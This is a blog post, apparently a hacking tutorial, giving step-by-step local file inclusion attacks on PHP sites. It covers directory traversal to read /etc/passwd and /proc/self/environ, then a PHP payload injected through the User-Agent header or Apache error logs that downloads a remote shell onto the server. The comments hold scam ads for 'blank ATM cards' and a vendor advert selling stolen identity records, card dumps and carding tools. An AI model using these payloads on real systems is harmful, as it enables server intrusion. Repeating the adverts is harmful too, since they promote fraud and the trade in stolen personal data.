[MethoD 1]
NOTE: You will need FireFox and its addon Tamper Data to do this method!
LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
In this method we are going to upload a shell by accessing the proc/self/environ.
Now we have our page
http://www.target.com/index.php?include=register.php
And now we are going to do this:
http://www.target.com/index.php?include=../
If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:
http://www.target.com/index.php?include=../etc/passwd
And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?include=../etc/passwdhttp://www.target.com/index.php?include=../../etc/passwdhttp://www.target.com/index.php?include=../../../etc/passwd
And so on. Now let's say we got to this URL
http://www.target.com/index.php?include=../../../etc/passwd
And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?include=../../../proc/self/environ
If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
http://www.taget.com/shell.php
And rape the server.
Now LFI method 2
NOTE: This only works on apache servers!
Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log
If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
Now when you have found the file, open up cmd and type in
telnet www.tagrget.com 80
When you are inside the telnet, you copy the following code(you use your own shell url ofc)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).
Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:
http://www.taget.com/shell.php
Lecture by ASim ALi AnSaRi
Share this
4 comments
Write commentsHOW TO GET BLANK ATM CARD AND WITHDRAW
ReplyUNLIMITED CASH
This is the happiest moment of my life having no longer to worry about paying bills as i have been settled for life. A lot has been said about atm hacking and blank card for cash withdrawal but it all seemed like a myth to me until i eventually lost my job few months back and the world seemed to be moving backwards. I went online in search of jobs and means to an end and there i found comments about blankatmdeliveryxpress and how they deliver this card in less than 7 days with no risk involved and a far much lesser price compared to what the card itself can give you, i then made contact and purchase one from them with almost my last dollars I took the risk and in exactly 6 days latter my card and a manual was delivered to my home address here in California and that same evening i used the card was able to take out $5000 for a start its been just 3 weeks and my life has taken a new shape. I simply want to say thank you to this electronic company and help spread their fame abroad. If you ever are in need of this card contact them via email :blankatmdeliveryxpress@gmail.com.
Don't mail them if you not really ready for this card is gonna cost you money to buy the card note that,they offer card to firms, orphans,individual and business personnels mail them immediately .
me and my husband are here to testify about how we use Oscar White black ATM card to make money and also have our own business today. Go get your blank ATM card today and be among the lucky ones. This PROGRAMMED blank ATM card is capable of hacking into any ATM machine,anywhere in the world.It has really changed our life for good and now we can say we are rich and we can never be poor again. You can withdraw the maximum of $5,000 daily and $140,000 a month, We can proudly say our business is doing fine and we have up to $20,000 000 (20 millions dollars in our account) Is not illegal,there is no risk of being caught ,because it has been programmed in such a way that it is not traceable,it also has a technique that makes it impossible for the CCTV to detect you..For details and cost on how to get yours today, email the hackers on : oscarwhitehackersworld@gmail.com ,Text & Call or Whats-app: +1(209)-643-1515
ReplyGET RICH WITH THE USE OF BLANK ATM CARD FROM
Reply(besthackersworld58@gmail.com)
Has anyone here heard about blank ATM card? An ATM card that allows you to withdraw cash from any Atm machine in the world. No name required, no address required and no bank account required. The Atm card is already programmed to dispense cash from any Atm machine worldwide. I heard about this Atm card online but at first i didn't pay attention to it because everything seems too good to be true, but i was convinced & shocked when my friend at my place of work got the card from guarantee Atm card vendor. We both went to the ATM machine center and confirmed it really works, without delay i gave it a go. Ever since then I’ve been withdrawing $1,500 to $5000 daily from the blank ATM card & this card has really changed my life financially. I just bought an expensive car and am planning to get a house. For those interested in making quick money should contact them on: Email address : besthackersworld58@gmail.com or WhatsApp him on +1(323)-723-2568
FULLZ AVAILABLE WITH HIGH CREDIT SCORES 700+
Reply(Spammed From Credit Bureau of USA)
=>Contact 24/7<=
Telegram> @killhacks
ICQ> 752822040
FRESHLY SPAMMED
VALID INFO WITH VALID DL EXPIRIES
*All info included*
NAME+SSN+DOB+DL+DL-STATE+ADDRESS
Employee & Bank details included
CC & CVV'S ONLY USA AVAILABLE
$1 for SSN+DOB
$2 for SSN+DOB+DL
$5 for High credit fullz 700+
(bulk order negotiable)
*Payment in all crypto currencies will be accepted
->You can buy few for testing
->Invalid or wrong info will be replaced
->Serious buyers needed for long term
PLEASE DON'T ASK ANYTHING FOR FREE
TOOLS & TUTORIALS AVAILABLE FOR SPAMMING, HACKING & CARDING
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
Ethical Hacking Tools & Tutorials
Kali linux
Facebook & Google hacking
SQL Injector
Bitcoin flasher
Keylogger & Keystroke Logger
Premium Accounts (Netflix, coinbase, FedEx, Pornhub, etc)
Paypal Logins
Bitcoin Cracker
SMTP Linux Root
DUMPS with pins track 1 and 2
Smtp's, Safe Socks, rdp's, VPN, Viruses
Cpanel
Php mailer
Server I.P's & Proxies
HQ Emails Combo
*If you need a valid vendor it's very prime chance, you'll never be disappointed*
CONTACT 24/7
Telegram> @killhacks
ICQ> 752822040
EmoticonEmoticon